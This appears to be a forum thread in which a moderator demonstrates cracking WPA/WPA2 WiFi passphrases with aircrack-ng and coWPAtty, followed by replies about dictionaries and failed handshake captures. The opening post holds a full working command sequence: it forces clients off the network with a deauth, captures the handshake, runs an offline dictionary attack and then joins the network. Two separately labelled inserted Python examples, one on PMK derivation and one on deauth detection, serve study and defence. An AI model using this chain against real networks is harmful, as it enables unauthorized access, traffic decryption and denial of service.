Thread: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

  1. #1
    Moderator g0tmi1k
    Join Date
    Feb 2010
    Posts
    1,771

    [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/3356785
    Download video: http://www.mediafire.com/?9dkjbygu238p2uj


    What is this?

    Comparing Aircrack-ng versus coWPAtty, in the time it takes to crack a WPA2 PSK key.
    It shows 4 different cracks, the time taken and speed of the crack (see results).
    > Aircrack-ng (Dictionary)
    > Aircrack-ng & airolib-ng (Pre-computed hashes)
    > coWPAtty (Dictionary)
    > coWPAtty & Genpmk (Pre-computed hashes)


    How does this work?
    To crack a WPA/WPA2 PSK you need to capture a ‘handshake’. To get this packet, the attacker needs to disconnect a client currently connected to the network (if the attacker keeps repeating this part, it becomes a DoS for the user).

    Once the key packet has been captured, it is time to start an offline dictionary attack. If the network key is in the dictionary, it's just a question of waiting for the dictionary file to be processed.

    From here, the attacker can use that key to decrypt the captured data from before, and now is able to ‘read’ it as well as join the network.

    If there isn't a connected client, you can't do this. If the network key isn't in the dictionary file, you can't do this.

    You can speed up the cracking process by creating pre-calculated hash files (see results for how much faster!)

    Results
    *For the table see blog*

    What do I need?
    > Aircrack-ng suite
    > WiFi card that supports monitor mode
    > Big dictionary
    > Processing power


    Software
    Name: Aircrack-ng
    Version: 1.0-rc3
    Home Page: http://www.aircrack-ng.org/doku.php
    Download Link: http://download.aircrack-ng.org/airc...1.0-rc3.tar.gz

    Name: coWPAtty
    Version: 4.3
    Home Page: http://www.willhackforsushi.com/Cowpatty.html
    Download Link: http://www.willhackforsushi.com/code/cowpatty/4.3/cowpatty-4.3.tgz

    Commands:
    Code:
    # Put the card into monitor mode and find the target network
    airmon-ng start wlan0
    airodump-ng mon0

    # Capture on the network's channel, writing output-01.cap
    airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0

    # 1. Aircrack-ng (dictionary): one deauth so the client re-does the handshake, then crack
    aireplay-ng --deauth 1 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0
    aircrack-ng output-01.cap -w /root/tools/dictionaries/webster-dictionary.txt

    # 2. Aircrack-ng & airolib-ng (pre-computed hashes): PMK database for the ESSID(s) listed in the file "essid"
    airolib-ng crackwpa --import passwd /root/dictionaries/webster-dictionary.txt
    airolib-ng crackwpa --import essid essid
    airolib-ng crackwpa --stats
    airolib-ng crackwpa --clean all
    airolib-ng crackwpa --batch
    airolib-ng crackwpa --verify all
    aircrack-ng -r crackwpa output-01.cap

    # 3. coWPAtty (dictionary)
    cowpatty -s g0tmi1k -r /root/output-01.cap -f /root/dictionaries/webster-dictionary.txt

    # 4. coWPAtty & genpmk (pre-computed hashes)
    genpmk -s g0tmi1k -d /root/output-hash -f /root/dictionaries/webster-dictionary.txt
    cowpatty -s g0tmi1k -r /root/output-01.cap -d /root/output-hash

    # Join the network with the recovered key and check connectivity
    wpa_passphrase g0tmi1k precivilization > wpa.conf
    wpa_supplicant -Dwext -iwlan0 -c /root/wpa.conf
    dhclient -r
    dhclient wlan0
    ping 192.168.1.1



    Notes:

    Song: First Sate - Off the Radar (First State's 808 Clash Mix)
    Video length: 08:38
    Capture length: 01:14:29


    Blog Post: http://g0tmi1k.blogspot.com/2010/02/...rcrack-ng.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/2394-%5Bvideo%5D-cracking-wifi-wpa-wpa2-aircrack-ng-vs-cowpatty.html
    Last edited by g0tmi1k; 03-05-2011 at 03:15 PM.
    Have you...g0tmi1k?
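The "pre-computed hashes" speed-up in the post comes from how WPA/WPA2 turns a passphrase into the Pairwise Master Key: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits). Every dictionary guess has to pay those 4096 HMAC rounds, and because the SSID is the salt, airolib-ng and genpmk can only pre-compute a table for one specific ESSID. The following is an added example, not code from the post or from the aircrack-ng/coWPAtty projects: it derives the PMK the way wpa_passphrase does, builds a tiny per-SSID table, and shows that the same passphrase under a different SSID gets no table hit. It uses only the Python standard library; the wordlist and the SSIDs "linksys" and "kettle-7f3a" are constructed sample values, while "password"/"IEEE" is the published IEEE 802.11i test vector.

```python
"""
Added example (not from the original post or the tools it describes):
derive the WPA/WPA2 PMK like wpa_passphrase / airolib-ng / genpmk do and
show why a pre-computed PMK table is bound to a single SSID.
"""
import hashlib
import time
from typing import Dict, List, Optional

PBKDF2_ITERATIONS = 4096   # fixed by IEEE 802.11i; this is what makes each guess slow
PMK_LENGTH = 32            # 256-bit PMK


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LENGTH)


def build_pmk_table(ssid: str, wordlist: List[str]) -> Dict[bytes, str]:
    """The up-front work airolib-ng / genpmk do: one PMK per word, for ONE SSID."""
    return {derive_pmk(word, ssid): word for word in wordlist}


def lookup_pmk(table: Dict[bytes, str], pmk: bytes) -> Optional[str]:
    """With a table, a guess is a dictionary lookup: no PBKDF2 at crack time."""
    return table.get(pmk)


def time_per_guess(ssid: str, samples: int = 50) -> float:
    """Seconds one PBKDF2 derivation costs on this machine (the dictionary-mode cost per word)."""
    start = time.perf_counter()
    for i in range(samples):
        derive_pmk(f"sample-{i}", ssid)
    return (time.perf_counter() - start) / samples


# Constructed sample data: a short "wordlist" and two network names.
WORDLIST = ["password", "letmein", "precivilization", "qwerty123"]
DEFAULT_SSID = "linksys"        # a factory-default name a generic table would target
CUSTOM_SSID = "kettle-7f3a"     # a unique, non-default name (constructed)


def table_hit_for(ssid: str, passphrase: str, table_ssid: str = DEFAULT_SSID) -> Optional[str]:
    """Look up the PMK of a network (ssid, passphrase) in a table built for table_ssid."""
    table = build_pmk_table(table_ssid, WORDLIST)
    return lookup_pmk(table, derive_pmk(passphrase, ssid))


if __name__ == "__main__":
    print("PMK(password, IEEE) =", derive_pmk("password", "IEEE").hex())
    print(f"one guess costs about {time_per_guess(DEFAULT_SSID) * 1e3:.2f} ms of PBKDF2")
    print("table for", DEFAULT_SSID, "-> hit on", DEFAULT_SSID, ":", table_hit_for(DEFAULT_SSID, "letmein"))
    print("same passphrase on", CUSTOM_SSID, ":", table_hit_for(CUSTOM_SSID, "letmein"))
```

This is why airolib-ng needs the ESSID imported (`--import essid`) and genpmk takes `-s`: a table is only valid for the SSID it was salted with. From the defensive side the two levers are visible in the code: a non-default SSID forces any table to be rebuilt for that one network, and a long random passphrase that is not in any wordlist is never found, table or not.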

  2. #2
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    1

    Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

    Thank you my dear, but how can I get a dictionary

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    4

    Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

    You can find tons of different dictionaries all over the net, just do some searching.
    Remember, Google is your friend!

  4. #4
    Moderator g0tmi1k
    Join Date
    Feb 2010
    Posts
    1,771

    Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

    Quote Originally Posted by SAIEF007S
    Thank you my dear, but how can I get a dictionary
    I've posted a few on my blog. Link was in the top post, but in case you didn't see it:
    g0tmi1k: [Site News] February Update - ISOs and Dictionaries
    Have you...g0tmi1k?

  5. #5
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    1

    Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

    So how would I use a dictionary I download if I use BackTrack on a live boot CD?

  6. #6
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    5

    Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

    Quote Originally Posted by canihitdat
    so how would i use a dictionary i download if i use backtrack on a live boot cd
    That's what I also would like to know. If anyone could post a response with a link to a tutorial, that would be great.

  7. #7
    Moderator g0tmi1k
    Join Date
    Feb 2010
    Posts
    1,771

    Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

    Quote Originally Posted by codehpro
    that's what i also would like to know if anyone could post a response with a link to a tutorial that would be great
    After downloading a dictionary...
    replace: /root/dictionaries/webster-dictionary.txt
    with: [Wherever you downloaded the file to!] EXAMPLE /root/dictionarythatijustdownloaded.dic
    Have you...g0tmi1k?

  8. #8
    Just burned his ISO CrazyBranch
    Join Date
    Aug 2010
    Location
    Croatia
    Posts
    15

    Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

    Quote Originally Posted by codehpro
    that's what i also would like to know if anyone could post a response with a link to a tutorial that would be great
    There is a default BT4 dictionary located in /pentest/passwords/wordlists that contains about 1.7M words... if you want more extensive ones, Google them. I did just recently and found a nice supply of them.
    As for usage, you should study the man pages of aircrack-ng or their tutorials on the official pages.

  9. #9
    Moderator g0tmi1k
    Join Date
    Feb 2010
    Posts
    1,771

    Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

    Quote Originally Posted by mobster
    I have been testing on my AP with WPA/WPA2-PSK CCMP
    everything was going ok until I realized that I can't get the "handshake" after using
    Code:
    aireplay-ng --deauth
    My Q is: do I have to use a DoS attack on the connected PC so that I get the handshake, or do I only need to enter the deauth command once and I will get the handshake?
    What OS is your target running? I found that I can't deauth one of my Windows 7 systems.
    If you DoS, you might stop the target from talking to the Access Point, which will have the handshake you're after!
    You're going to have to wait for someone else to rejoin OR the current target to disconnect/reboot/power off...


    Quote Originally Posted by Jimmy87
    @Mobster,

    I believe that handshake occurs when the connected client, reconnects to the AP (after the deauth) meaning airodump can capture the handshake between the AP and the Client. If you do a DoS on the client it won't be able to connect back meaning you won't capture the handshake.

    If it's your own AP you're testing then deauth your client, reconnect with that client and you should see that airodump captures the handshake. I'm no expert but I think that's the basics.

    What response do you get when you send the deauth?
    Thanks for the reply.
    Yeah, that sounds about right to me as well (but I'm not an expert either!)
    Could you, mobster, manually disconnect/connect and see if you can get the handshake that way, or if something else is going wrong...
    *If you can't TRY and manually join, then I don't think this is the place for you... Rules*

    Quote Originally Posted by mobster
    Thanks for the reply

    The response is the same in the video but it does not capture the handshake.

    I was reading other threads by g0tmi1k, and that if the client PC is windows 7 then there may be some problems. If this is the issue then what is the reason for it, is it windows 7 security related or another issue?
    It might just be my hardware/setup on my Windows 7 system, but I do know they have improved a lot of the wireless networking since XP...
    Have you...g0tmi1k?
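The discussion above turns on what a single deauth versus a repeated deauth (the DoS case) looks like on the air: one deauthentication frame makes the client re-associate and re-do the four-way handshake, while a stream of them keeps the client off the network. From the network owner's side that stream is also the easiest thing to detect. The following is an added example and not code from the thread or from aircrack-ng: a minimal wireless-IDS style check that parses raw IEEE 802.11 management frames, picks out deauthentication frames (type 0, subtype 12, reason code in the first two body bytes) and flags a burst from one BSSID within a short window. It uses only the Python standard library; the frames, MAC addresses and timestamps are constructed sample data.

```python
"""
Added example (not from the thread): parse 802.11 management frames and
alert on a burst of deauthentication frames from one BSSID.  All frames,
MAC addresses and timestamps below are constructed sample data.
"""
import struct
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

MGMT_TYPE = 0        # frame-control type 0 = management
DEAUTH_SUBTYPE = 12  # management subtype 12 = deauthentication
BEACON_SUBTYPE = 8   # management subtype 8 = beacon


def build_mgmt_frame(subtype: int, da: bytes, sa: bytes, bssid: bytes, body: bytes = b"") -> bytes:
    """Bare management frame (24-byte header + body), used here only to build sample input."""
    fc = (subtype << 4) | (MGMT_TYPE << 2)          # protocol version 0, flags byte 0
    return bytes([fc, 0x00]) + b"\x00\x00" + da + sa + bssid + b"\x00\x00" + body


def parse_mgmt_frame(frame: bytes) -> Optional[Tuple[int, bytes, bytes, bytes, Optional[int]]]:
    """Return (subtype, addr1, addr2, addr3, reason_code) for a management frame, else None."""
    if len(frame) < 24:
        return None
    fc = frame[0]
    if fc & 0x03 != 0 or (fc >> 2) & 0x03 != MGMT_TYPE:
        return None                                 # wrong protocol version or not management
    subtype = (fc >> 4) & 0x0F
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    reason = None
    if subtype == DEAUTH_SUBTYPE and len(frame) >= 26:
        reason = struct.unpack("<H", frame[24:26])[0]   # reason code is little-endian
    return subtype, addr1, addr2, addr3, reason


def mac_str(mac: bytes) -> str:
    return ":".join(f"{x:02x}" for x in mac)


def detect_deauth_bursts(frames: List[Tuple[float, bytes]], window: float = 1.0,
                         threshold: int = 5) -> List[Tuple[str, float, int]]:
    """Count deauth frames per BSSID per time bucket; return (bssid, bucket_start, count) at or above threshold."""
    buckets: Dict[Tuple[bytes, int], int] = defaultdict(int)
    for ts, raw in frames:
        parsed = parse_mgmt_frame(raw)
        if parsed is None or parsed[0] != DEAUTH_SUBTYPE:
            continue
        bssid = parsed[3]                           # addr3 carries the BSSID in management frames
        buckets[(bssid, int(ts // window))] += 1
    return [(mac_str(b), idx * window, n)
            for (b, idx), n in sorted(buckets.items()) if n >= threshold]


# Constructed sample capture: an AP, a client and the broadcast address (made-up MACs).
AP = bytes.fromhex("02aabbcc0001")
CLIENT = bytes.fromhex("02aabbcc0002")
BROADCAST = b"\xff" * 6
REASON_CLASS3 = struct.pack("<H", 7)   # reason 7: class 3 frame received from non-associated STA

SAMPLE_CAPTURE: List[Tuple[float, bytes]] = [
    (0.10, build_mgmt_frame(BEACON_SUBTYPE, BROADCAST, AP, AP)),
    (0.35, build_mgmt_frame(DEAUTH_SUBTYPE, CLIENT, AP, AP, REASON_CLASS3)),  # a lone, plausible deauth
    (0.40, build_mgmt_frame(BEACON_SUBTYPE, BROADCAST, AP, AP)),
]
# eight deauths carrying the AP's address inside 0.7 s: the pattern a repeated deauth produces
SAMPLE_CAPTURE += [(5.0 + i * 0.1, build_mgmt_frame(DEAUTH_SUBTYPE, CLIENT, AP, AP, REASON_CLASS3))
                   for i in range(8)]

if __name__ == "__main__":
    for bssid, start, count in detect_deauth_bursts(SAMPLE_CAPTURE):
        print(f"ALERT deauth burst: bssid={bssid} window_start={start:.1f}s count={count}")
```

The lone deauth at 0.35 s stays below the threshold, so a normal disconnect does not alert; the eight frames in the 5 s bucket do. A real sensor would feed this from a monitor-mode interface and would also watch for deauths whose transmitter address is the AP but whose sequence numbers or signal strength do not match the AP's own beacons, which is how spoofed frames are usually told apart from the AP's genuine ones.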

  10. #10
    Moderator g0tmi1k
    Join Date
    Feb 2010
    Posts
    1,771

    Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

    Quote Originally Posted by mobster
    What I'm trying to say is that I have three machines: one with BT, the second with Vista and the third with Windows 7.

    I got the key when I was sniffing the vista machine but with the windows 7 I couldn't.
    Yeah, I've found this too. I haven't found why yet, because too many variables keep changing to pinpoint why it's happening.
    I could do it to my desktop, but after moving house (with a new router) it wouldn't work on my laptop. Both have Windows 7.
    I'll mess about with some USB WiFi cards between the two and different OSes. Just need the time!

    Quote Originally Posted by SEALDRA
    Thank you... I've been searching for this video... but I wonder if someone with a pure heart can give me a big dictionary haha lol
    You can use the ones which come with BackTrack: /pentest/passwords/wordlists/
    and I've started to upload some: g0tmi1k: [Site News] February Update - ISOs and Dictionaries
    Last edited by g0tmi1k; 09-25-2010 at 01:36 PM.
    Have you...g0tmi1k?
